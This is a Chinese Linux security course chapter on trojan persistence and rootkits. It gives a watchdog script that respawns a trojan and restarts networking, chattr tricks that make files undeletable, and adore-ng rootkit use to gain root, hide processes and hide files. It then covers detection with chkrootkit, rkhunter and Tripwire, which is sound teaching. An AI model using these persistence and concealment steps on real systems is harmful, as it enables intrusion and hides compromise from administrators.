23.1 生成木馬程式父程序實時監控木馬
23.2 建立一個讓root使用者都删除不了的木馬程式
23.3 不讓木馬程式和外網資料主動通信
23.4 使用rookkit把木馬程式的父程序和木馬檔案隐藏
23.5 檢查rookit
23.1 生成木馬程式父程序實時監控木馬
23.1.1 生成木馬程式的父程序實作自我檢測并運作:
生成木馬的父程序,自動檢測子程序,如果子程序被删除,父程序可以自動啟動子程序。 這就是Linux删除木馬後,木馬自動又生成。
[[email protected] ~]# cp /usr/bin/fregonnzkq /usr/wke
[[email protected] ~]# cp /usr/wke /usr/bin/fregonnzkq
cp: overwrite `/usr/bin/fregonnzkq'? #直接複制 怎麼做?
[[email protected] ~]# which cp #cp是一個别名
alias cp='cp -i'
/bin/cp
[[email protected] ~]# /bin/cp /usr/wke /usr/bin/fregonnzkq #直接複制
23.1.2 如何知道一個程序是否運作?
用這個ps -axu | grep xxx ?
擴充指令:pgrep
[[email protected] ~]# pgrep fregonnzkq
2482
[[email protected] ~]# pgrep fregonnzkq | wc -l
1
23.1.3 木馬程式的父程序腳本
[[email protected] ~]# vim /bin/workstat #寫一個木馬程式的父程序,用于檢測木馬運作的腳本,
#!/bin/bash
while true
do
a=`pgrep fregonnzkq | wc -l` #統計目前系統運作了幾個木馬程序
if [ $a -le 1 ]; then #如查木馬程序數小于等1,那麼再啟動一個子程序,這樣可以保障,最少有兩個木馬子程序在運作
/bin/cp /usr/wke /usr/bin/fregonnzkq #防止子程序檔案被删除
/usr/bin/fregonnzkq &
service network restart #防止管理者關閉外網,讓木馬主動啟動網絡和外面聯系。哈哈
fi
done
[[email protected] ~]# chmod +x /bin/workstat
[[email protected] ~]# /bin/workstat &
[1] 5321
測試:
[[email protected] ~]# pkill fregonnzkq
[[email protected] ~]# ps -axu | grep freg #删除程序後,還有木馬程式在運作
排查:
這種情況下,你需要把找到木馬的父程序,把父程序删除,再把病毒的原體删除
[[email protected] ~]# pstree | grep freg #查找父程序
|-gnome-terminal-+-bash---workstat---2*[fregonnzkq---sleep]
[[email protected] ~]# ps -axu | grep workstat #檢視父程序路徑
root 7533 2.1 0.1 106152 1288 pts/0 S 10:29 0:12 /bin/bash /bin/workstat
[[email protected] ~]# vim /bin/workstat #可以檢視一下父程序内容
[[email protected] ~]# rm -rf /bin/workstat #删除父程序
[[email protected] ~]# rm -rf /usr/wke #删除父程序中調用的病原體
[[email protected] ~]# kill -9 7533
[[email protected] ~]# killall fregonnzkq
23.2 建立一個讓root使用者都删除不了的木馬程式
發現windows中 有檔案删除不了,怎麼辦?
使用360 強制删除,粉碎檔案
強制删除,粉碎檔案背後的技術是什麼?
那麼在Linux下怎麼辦?
[[email protected] ~]# touch hack.sh aa.sh
[[email protected] ~]# ll hack.sh aa.sh
-rw-r--r-- 1 root root 0 May 24 21:29 aa.sh
-rw-r--r-- 1 root root 0 May 24 21:29 hack.sh
23.2.1 黑客使用xshell悄悄執行在背景添加attr擴充屬性:
[[email protected] ~]# chattr +i hack.sh
删除檔案:
[[email protected] ~]# rm -rf aa.sh
[[email protected] ~]# rm -rf hack.sh #發現删除不了
擴充權限
+i:即Immutable,系統不允許對這個檔案進行任何的修改。
如果目錄具有這個屬性,那麼任何的程序隻能修改目錄之下的檔案,不允許建立和删除檔案。
注:immutable [ɪˈmju:təbl] 不可改變的
-i :移除i參數。
檢視:
[[email protected] ~]# lsattr hack.sh
----i--------e- hack.sh
[[email protected] ~]# chattr -i hack.sh
[[email protected] ~]# echo aaa >> hack.sh
[[email protected] ~]# rm -rf hack.sh
例: 管理者可以利用擴充屬性,讓木馬程式沒有可執行權限
[[email protected] ~]# chmod 0000 /bin/workstat && chattr +i /bin/workstat
23.2.2 程序殺掉後,快速又生成更多程序,怎麼辦?
解決方法:不殺程序,但是讓程序不工作
[[email protected] ~]# ps -axu | grep freg
root 15011 0.2 0.1 106152 1284 pts/0 S 10:30 0:04 /bin/bash /usr/bin/fregonnzkq
[[email protected] ~]# top -p 15011
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
15011 root 20 0 103m 1284 1080 S 0.0 0.1 0:04.11 fregonnzkq
#S 表示是sleep狀态 R 表示正在運作
[[email protected] ~]# kill -STOP 15011 #讓程序停止運作,不是殺掉。 直接殺死程序,會再産生新程序,這裡把程序停止,讓程序不在發揮攻擊作用,然後你自己再慢慢排查
測試:
[[email protected] ~]# top -p 15011
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
15011 root 20 0 103m 1284 1080 T 0.0 0.1 0:04.11 fregonnzkq
23.3 不讓木馬程式和外網資料主動通信
我的木馬需要對外發大量資料包,管理可以通過iptables在output鍊上做限制,比如,把從output鍊出去state狀态為new的全部drop掉。
[[email protected] ~]# iptables -t filter -A OUTPUT -m state --state NEW -j DROP
測試:
[[email protected] ~]# ping 192.168.1.1 #此伺服器不能直接和外網通信了
[[email protected] ~]# ping www.baidu.com
ping: unknown host www.baidu.com
我們可以在/bin/workstat腳本中,添加一行:
[[email protected] ~]# iptables -F OUTPUT
[[email protected] ~]# iptables -t filter -A OUTPUT -m state --state NEW -j ACCEPT
這樣就可以上網了。
23.4 使用rootkit把木馬程式的父程序和木馬檔案隐藏
rootkit : Linux木馬。
LKM: LKM英文是:Loadable Kernel Modules,翻譯過來就是“可加載核心子產品程式”,
這是一種差別于一般應用程式的系統級程式,它主要用于擴充linux的核心功能。
LKM可以動态地加載到記憶體中,無須重新編譯核心。
由于LKM具有這樣的特點,是以它經常被用于一些裝置的驅動程式,例如聲霸卡,網卡,USB驅動等等。
聲霸卡驅動現在運作着? 運作
這個聲霸卡驅動的程序在哪? 很難找到
如果我的木馬程式以子產品運作?
安裝: adore-ng (rootkit其中一種)
23.4.1 實戰:通過rootkit隐蔽行蹤:提權,隐藏程序号,隐藏檔案
1、安裝:
在make前,需要安裝gcc
[[email protected] ~]# unzip adore-ng-master.zip
[[email protected] ~]# cd adore-ng-master
[[email protected] adore-ng-master]# rpm -ivh /mnt/Packages/kernel-devel-2.6.32-220.el6.x86_64.rpm
[[email protected] adore-ng-master]# make -j 4 #編譯,将源碼編譯成二進制檔案
[[email protected] adore-ng-master]# insmod adore-ng.ko #加載子產品
2、測試,檢視幫助:
[[email protected] adore-ng-master]# ./ava
Usage: ./ava {h,u,r,R,i,v,U} [file or PID]
I print info (secret UID etc)
h hide file #隐藏檔案
u unhide file
r execute as root #可以提權,以root身份運作程式
R remove PID forever
U uninstall adore
i make PID invisible #隐藏程序。隐藏你的木馬程式
v make PID visible
測試:
準備環境,建立一個普通使用者于測試。然後在普通使用者上,通過ava指令,提權後,以root身份運作一個程序。
提權:
提高自己在伺服器中的權限,主要針對網站入侵過程中,當入侵某一網站時,
通過各種漏洞提升WEBSHELL權限以奪得該伺服器超級管理者權限。
3、建立一個普通使用者:
[[email protected] ~]# useradd kill
[[email protected] ~]# echo 123456 | passwd --stdin kill
23.4.2 通過ava指令提權。讓普通使用者kill可以獲得root權限
[[email protected] adore-ng-master]# cp -r /usr/src/adore-ng-master /tmp/ #複制木馬程式到到/tmp
[[email protected] adore-ng-master]# chmod 777 /tmp/adore-ng-master/ -R #讓kill普通使用者也可以使用木馬程式
[[email protected] adore-ng-master]# ssh [email protected] #以普通帳号登入
[[email protected] ~]$ cd /tmp/adore-ng-master/
23.4.3 實戰:提權 ,使用 r 選項: execute as root #以root身份運作程式
[[email protected] adore-ng-master]$ ll /etc/shadow
---------- 1 root root 1071 Apr 7 10:17 /etc/shadow
[[email protected] adore-ng-master]$ vim /etc/shadow
[[email protected] adore-ng-master]$ ./ava r vim /etc/shadow #編輯時,可以寫入一些内容,測試是否可以正常寫入
檢視修改成功:
[[email protected] ~]# vim /etc/shadow
另外,在别一個終端上檢視,此程序的使用者身份:
[[email protected] ~]# ps -axu | grep shadow
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
root 6874 0.1 0.1 10216 2924 pts/3 S+ 04:12 0:00 /usr/bin/vim /etc/shadow
root 6879 0.0 0.0 4024 692 pts/2 S+ 04:12 0:00 grep shadow
23.4.4 實戰2: 隐藏程序。 隐藏你的木馬程式
隐藏程序
[[email protected] adore-ng-master]# workstat &
[1] 13204
[[email protected] adore-ng-master]# ps -axu | grep workstat #可以檢視到
[[email protected] adore-ng-master]# ./ava i 13204 #隐藏程序
56,0,0,56
Adore 1.56 installed. Good luck.
Made PID 13204 invisible.
檢視:
[[email protected] ~]# ps -axu | grep work #找不到父程序了
[[email protected] ~]# ps -axu | grep freq #找不到子程序了
[[email protected] ~]# tail -n 2 /tmp/date.txt #檢視木馬還在運作
Wed Oct 25 18:07:54 CST 2017
Wed Oct 25 18:07:55 CST 2017 #從輸出的時間可以看出,木馬還健壯的運作
當程序找不到時,查找一下被黑那天産生的新檔案,可以1
find / -mtime -1
24.4.5 實戰3: 黑客隐藏木馬程式檔案
1、隐藏檔案
[[email protected] adore-ng-master]# ./ava h /bin/workstat
56,0,0,56
Adore 1.56 installed. Good luck.
File '/bin/workstat' is now hidden.
[[email protected] adore-ng-master]# ./ava h /usr/wke
2、如何找出來wke ?
[[email protected] adore-ng-master]# cp /bin/wke /tmp/
[[email protected] adore-ng-master]# ./ava h /tmp/wke
[[email protected] adore-ng-master]$ ls /tmp
[[email protected] adore-ng-master]$ ls -a /tmp#沒有這個檔案
. ..
[[email protected] adore-ng-master]$ cat wke #但是實際上它還在這個目錄下
#!/bin/bash
touch /tmp/aaa.txt
while true
do
echo `date` >> /tmp/data.txt
sleep 1
done
嘗試:查找最近被黑客修改或建立的檔案 這個思路可以:1
[[email protected] adore-ng-master]# find /bin/ -mtime -1 #找不到出來
有沒有辦法查找出 wke : 沒有。 除非把rootkit木馬程式關了,或者rookit不運作
注: 黑了你系統,能提權成root,能隐藏木馬程序,能隐藏檔案。 你如何排毒 ?
3、恢複出來:
[[email protected] adore-ng-master]# ./adore-ng-master/ava u /tmp/wke
56,500,500,56
Adore 1.56 installed. Good luck.
File 'webshell.php' is now visible.
[[email protected] test]$ ls
wke
總結:
1、通過rootkit提權
2、通過rootkit隐藏木馬程序号
3、通過rootkit隐藏木馬檔案
23.5 檢查rookit
23.5.1 方法1:使用chkrootkit #這個包在centos7上沒有了
chkrootkit是一個Linux系統下的查找檢測rootkit後門的工具。
chkrootkit沒有包含在官方的CentOS或Debian源,是以我們将采取手動編譯的方法來安裝,這種方式也更加安全。由于需要編譯源代碼,是以還需要在系統中安裝好gcc編譯包。
在centos系統上,直接使用yum安裝,chkrootkit在centos的epel源中:
[[email protected] ~]# rpm -ivh chkrootkit-0.49-9.el6.x86_64.rpm #上傳到linux上,安裝
[root@xuegod63 ~]# rpm -qpl chkrootkit-0.49-9.el6.x86_64.rpm | more
或:
[[email protected] ~]#yum install chkrootkit #隻在6上運作,在centos7上沒有這個包了
[[email protected] ~]# which chkrootkit
/usr/sbin/chkrootkit
[[email protected] ~]# chkrootkit #直接運作開始檢查
。。。
Checking `ls'... INFECTED #被感染,指令可能被替換了
Checking `netstat'... INFECTED
Checking `bindshell'... not infected #沒有被感染 [ɪnˈfektɪd]
Checking `lkm'... You have 1 process hidden for readdir command #發現有一個程序被readdir指令隐藏,readdir():檢視檔案的一個底層的函數。 說明有隐藏檔案
You have 1 process hidden for ps command #有一個程序被ps指令隐藏
chkproc: Warning: Possible LKM Trojan installed #可能感染了LKM類型木馬
# Trojan [ˈtrəʊdʒən] 特洛伊 木馬
結果:已經被黑了,系統最好重安裝
Chkrootkit會對系統中的重要檔案進行掃描,可以将其加入crontab定時任務,定期進行掃描,看情況而定。
chkrootkit參數說明
Usage: ./chkrootkit [options] [test ...]
Options:
-l 顯示測試内容
-d debug模式,顯示檢測過程的相關指令程式
-q 安靜模式,隻顯示有問題部分,
-x 進階模式,顯示所有檢測結果
-r dir 設定指定的目錄為根目錄
-p dir1:dir2:dirN 檢測指定目錄
-n 跳過NFS連接配接的目錄
例:
[[email protected] ~]# chkrootkit -q
You have 1 process hidden for readdir command
You have 1 process hidden for ps command
chkproc: Warning: Possible LKM Trojan installed
23.5.2
方法2: rkhunter Rootkit獵手 在centos7下的epel源中有安裝包, 在centos7上使用這個來檢查rootkit
rkhunter簡介:
中文名叫”Rootkit獵手”,
rkhunter是Linux系統平台下的一款開源入侵檢測工具,具有非常全面的掃描範圍,
除了能夠檢測各種已知的rootkit特征碼以外,還支援端口掃描、常用程式檔案的變動情況檢查。
23.5.3 在centos6或7 上安裝其它檢查工具:
yum install rkhunter.noarch unhide.x86_64 # 沒有配置yum epel源,可以上傳到本地包到linux上
源碼下載下傳:http://downloads.sourceforge.net/rkhunter/
作用:
yum info rkhunter unhide
rkhunter.noarch : A host-based tool to scan for rootkits, backdoors and local exploits
unhide.x86_64 : Tool to find hidden processes and TCP/UDP ports from rootkits
rkhunter.noarch:基于主機的工具來掃描後門,後門和本地利用
unhide.x86_64:工具找到隐藏的程序和TCP / UDP端口從後門
1、下載下傳、安裝rkhunter #這裡直接上傳rpm到系統上
安裝rkhunter
[[email protected] ~]# rpm -ivh rkhunter-1.4.4-2.el6.noarch.rpm
2、為基本系統程式建立校對樣本,建議系統安裝完成後就建立。
[[email protected] rkhunter-1.4.2]# rkhunter --propupd
[ Rootkit Hunter version 1.4.4 ]
File created: searched for 173 files, found 141
參數:
[[email protected] ~]# rkhunter -h | grep propupd
--propupd [{filename | directory | package name},...] |
--propupd [file | directory | Update the entire file properties database,
[[email protected] rkhunter-1.4.2]# ls /var/lib/rkhunter/db/ #存儲樣本檔案的資料庫
[[email protected] rkhunter-1.4.2]# ls /var/lib/rkhunter/db/rkhunter.dat #樣本檔案的資料庫位置
檢視:
[[email protected] ~]# tail -f /var/lib/rkhunter/db/rkhunter.dat #檢視
File:0:/bin/mailx:26493bcbb1d2b9c3f8f243ba7367b08e76ddcfc678e57b6dda01a492f24b2e20::0755:0:0:378848:1266322100:mailx:0::
權限 檔案大小:時間
[[email protected] ~]# ll /bin/mailx
-rwxr-xr-x 1 root root 392008 Feb 16 2010 /bin/mailx
3、運作rkhunter檢查系統
它主要執行下面一系列的測試:
1. MD5校驗測試, 檢測任何檔案是否改動.
2. 檢測rootkits使用的二進制和系統工具檔案.
3. 檢測特洛伊木馬程式的特征碼.
4. 檢測大多常用程式的檔案異常屬性.
5. 執行一些系統相關的測試 - 因為rootkit hunter可支援多個系統平台.
6. 掃描任何混雜模式下的接口和後門程式常用的端口.
7. 檢測如/etc/rc.d/目錄下的所有配置檔案, 日志檔案, 任何異常的隐藏檔案等等.
8. 對一些使用常用端口的應用程式進行版本測試. 如: Apache Web Server, Procmail等.
執行檢測指令:
[[email protected] xxxxxx]# echo aaaaaa >> /usr/sbin/useradd
[[email protected] xxxxxx]# vim aa.sh
#!/bin/bash
sleep 3600
[[email protected] xxxxxx]# chmod +x aa.sh
[[email protected] xxxxxx]# ./aa.sh &
[[email protected] xxxxxx]# ps -axu | grep aa.sh
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.8/FAQ
root 3251 0.0 0.1 106148 1184 pts/2 S 10:57 0:00 /bin/bash ./aa.sh
root 3255 0.0 0.0 103300 852 pts/2 S+ 10:57 0:00 grep aa.sh
[[email protected] ~]# /root/adore-ng-master/ava i 3251 #估意隐藏程序ID
[ro[email protected] rkhunter-1.4.2]# rkhunter --check
等待一會,發現:find指令被找出來了。
不想要每個部分都以 Enter 來繼續,想要讓程式自動持續執行,可以使用:
[[email protected] rkhunter-1.4.2]# /usr/local/bin/rkhunter --check --sk
注: --sk 遇到需要按enter的地方,直接跳過
4、線上更新rkhunter
rkhunter是通過一個含有rootkit名字的資料庫來檢測系統的rootkits漏洞, 是以經常更新該資料庫非常重要, 你可以通過下面指令來更新該資料庫:
[[email protected] rkhunter-1.4.2]# rkhunter --update
5、檢測最新版本
讓 rkhunter 保持在最新的版本;
[[email protected] ~]# rkhunter --versioncheck
[ Rootkit Hunter version 1.4.4 ]
Checking rkhunter version...
This version : 1.4.4
Latest version: 1.4.6
注: 使用rkhunter 的檢測之後發現很多被修改的地方處理步驟:
1.将原主機的網絡線拔除,使用内網排查;
2.備份資料,把重要的服務安裝檔案和資料備份;
3.檢視備份的資料中有沒有怪異的檔案,可以下載下傳本地,使用windows中的防毒軟體,查一下
4.重新安裝一部完整的系統,使用yum update更新系統到最新版本
5. 使用nessus 之類的軟體,檢驗系統是否處在較為安全的狀态
6.将原本的重要資料移動至上個步驟安裝好的系統當中,并啟動原本伺服器上面的各項服務;
7.配置防火牆的規則
8.最後,将原本完整備份的資料拿出來進行分析,尤其是 logfile 部分,試圖找出黑客是由那個服務?那個時間點? 以那個遠端 IP 聯機進入本機等等的資訊,并針對該資訊研拟預防的方法,并應用在已經運作的機器上。
Tripwire是目前最為著名的unix下檔案系統完整性檢查的軟體工具,這一軟體采用的技術核心就是對每個要監控的檔案産生一個數字簽名,保留下來。當檔案現在的數字簽名與保留的數字簽名不一緻時,那麼現在這個檔案必定被改動過了。
病毒運作原理:
1、生成是病原體
2、通過腳本每隔1分鐘自動檢測一次,如果木馬程式不存在,就從病原體複制一份兒到某個目錄,然後執行副本木馬,生成一個随機命名的程式。把副本放到系統計劃任務多個路徑下
3、修改自啟動配置chkconfig --add xxx
4、修改自啟動項/etc/rc.local
解決方法:
删除病原體以及其副本
删除系統計劃任務中可疑的程式
删掉自啟動服務的腳本chkconfig --del xxx
删掉可疑的自啟動項:vi /etc/rc.local
删除/etc/crontab下可疑的任務
删除/etc/cron*下可疑的sh腳本
重新開機,檢視腳本是否還執行
23.5.3 實戰:使用Tripwire檢查檔案系統完整性
Tripwire是目前最為著名的unix下檔案系統完整性檢查的軟體工具,這一軟體采用的技術核心就是對每個要監控的檔案産生一個數字簽名,保留下來。當檔案現在的數字簽名與保留的數字簽名不一緻時,那麼現在這個檔案必定被改動過了。
Tripwire可以對要求校驗的系統檔案進行類似md5的運作,而生成一個唯一的辨別,即“快照”snapshot。當這些系統檔案的大小、inode号、權限、時間等任意屬性被修改後,再次運作Tripwire,其會進行前後屬性的對比,并生成相關的詳細報告。
1、下載下傳并安裝
[[email protected] ~]# yum install epel-release
安裝Tripwire,使用yum:
[[email protected] ~]# yum install tripwire
或直接本地上傳。
源代碼和二進制包下載下傳位址:https://sourceforge.net/projects/tripwire/files/
2、配置Tripwire
這一步使用密碼為Tripwire生成一個站點(site)密鑰和一個本地(local)密鑰。這可以幫助保護Tripwire免受未經授權的通路。本地密鑰用于資料庫檔案,站點密鑰用于配置檔案和政策檔案。您需要記住自己給出的密碼,因為您更新政策檔案或資料庫時需要輸入這些密碼。下面的指令生成密鑰:
[[email protected] ~]# tripwire-setup-keyfiles #密碼都是123456
[[email protected] ~]# tripwire --init #初始化資料庫:生成基準資料庫
Wrote database file: /var/lib/tripwire/xuegod63.cn.twd # 這是存儲資料的地方
3、配置Tripwire政策
[[email protected] ~]# vim /etc/tripwire/twpol.txt
[[email protected] ~]# ls /etc/tripwire/
site.key tw.cfg twcfg.txt tw.pol twpol.txt xuegod63.cn-local.key
ipython.me-local.key ####加密本地密鑰檔案
site.key ####加密站點密鑰檔案
tw.cfg ####加密配置變量檔案
tw.pol ####加密政策檔案
twcfg.txt ####定義資料庫、政策檔案和Tripwire可執行檔案的位置
twpol.txt ####定義檢測的對象及違規時采取的行為
4、添加或修改一些文檔
[[email protected] ~]#echo aaa >> /etc/passwd
[[email protected] ~]#useradd kill
5、第一次完整性檢查,和常用檢查參數
[[email protected] ~]#tripwire --check #可以發現以下内容被修改了。
Modified:
"/etc/group"
-------------------------------------------------------------------------------
Rule Name: Critical configuration files (/etc/group-)
Severity Level: 100
-------------------------------------------------------------------------------
Modified:
"/etc/group-"
-------------------------------------------------------------------------------
Rule Name: Critical configuration files (/etc/passwd)
Severity Level: 100
-------------------------------------------------------------------------------
Modified:
"/etc/passwd"
23.5.4 示例及方法
例1:隻檢查指定的檔案或目錄
[[email protected] ~]# tripwire --check /etc/passwd
[[email protected] ~]# tripwire --check /etc/
例2:更新基準資料庫檔案
###更新的目的是很正常的,因為check 是基于基準資料的###
方法1:
[[email protected] ~]# tripwire --init
方法:2
在 /var/lib/tripwire/report 目錄中,Tripwire 生成的所有報告檔案都是 hostname<date_stamp>.twr 形式的。
通過按日期順序列出檔案,簡單地選擇這次 Tripwire 掃描生成的報告。一旦有了正确的檔案,就可以使用下面這個指令更新資料庫:
[[email protected] ~]# tripwire --update --twrfile /var/lib/tripwire/report/xuegod63.cn-20171124-234117.twr
執行該指令之後,您就進入了一個編輯器。搜尋所報告的檔案名。所有侵害或更新都在檔案名前面有一個 [x]。該示範中的查找模式如下:
[x] "/etc/passwd"
如果您希望接受這些更改為正當的,則隻需儲存并退出檔案即可。Tripwire 不再報告此檔案。如果您想要這個檔案不被添加到資料庫,那麼請删除 ‘x’。
儲存檔案并退出編輯器時,若有資料庫更新發生,會提示您輸入密碼以完成該過程。如果沒有更新發生,那麼 Tripwire 會通知您的,并且不需要輸入密碼。該示範中出現以下提示,因為資料庫将被更新:
Please enter your local passphrase: 123456
Wrote database file: /var/lib/tripwire/xuegod63.cn.twd
總結:
23.1 生成木馬程式父程序實時監控木馬
23.2 建立一個讓root使用者都删除不了的木馬程式
23.3 不讓木馬程式和外網資料主動通信
23.4 使用rookkit把木馬程式的父程序和木馬檔案隐藏
23.5 檢查rookit